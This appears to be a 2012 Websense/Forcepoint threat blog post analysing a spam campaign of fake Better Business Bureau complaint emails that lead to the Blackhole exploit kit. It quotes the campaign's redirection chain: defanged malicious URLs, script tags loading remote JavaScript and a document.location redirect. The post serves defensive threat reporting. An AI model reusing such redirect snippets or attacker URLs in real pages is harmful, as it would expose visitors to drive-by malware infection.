September 24, 2012

BBB malicious spam flood


U.S. and Canadian businesses looking to maintain their reputation and effectively handle customer disputes are once again being targeted by another barrage of malicious BBB (Better Business Bureau) complaint notifications.

While BBB campaigns have been circulating for a good many years, for example this 2008 certificate scam, the Websense® ThreatSeeker® Network has detected and intercepted a marked increase in BBB malicious email this month. Earlier in September, the ThreatSeeker Network protected customers and continues to protect them from thousands of malicious email each day. Today, with this exponential growth, it is now protecting our customers from hundreds of thousands of BBB messages per hour!

In an attempt to look authentic, the messages include an official graphic from the BBB Web site but, as is often the case with malicious email campaigns, they also include suspicious grammar: "about your company possible involvement in check cashing and Money Order Scam."

Additionally, a number of different subjects have been utilized for this campaign, presumably in an attempt to thwart detection, including random "Complaint IDs," which you can see in the following sample set:

As with other similar malicious campaigns with themes relating to ADP, Twitter, and LinkedIn,  the techniques, tools and redirection path that are used are pretty much the same. Tools like the Cutwail spambot and Blackhole exploit kit  seem to be the main weapons used by cybercriminals in malicious spam nowadays.

Redirection paths:

1) hxxp://vargasvilcolombia.com/PykKDZe/index.html


<h1>WAIT PLEASE</h1>


<script type="text/javascript" src="hxxp://pst.org.br/Wi4aFSLZ/js.js"></script>

<script type="text/javascript" src="hxxp://www.adahali.com/NQ9Ba2ap/js.js"></script>



3) document.location='hxxp://';

(Please refer to our previous blog post to learn more about the landing page)

As is very common these days, the payload for this particular campaign is the recently updated BlackHole Exploit Kit v 2.0. More information about the malware files that gets pushed to the computer can be found in our ThreatScope reports:


ThreatScope report for initial file

ThreatScope report for additional payload


Forcepoint-authored blog posts are based on discussions with customers and additional research by our content teams.

Read more articles by Forcepoint

About Forcepoint

Forcepoint is the leading user and data protection cybersecurity company, entrusted to safeguard organizations while driving digital transformation and growth. Our solutions adapt in real-time to how people interact with data, providing secure access while enabling employees to create value.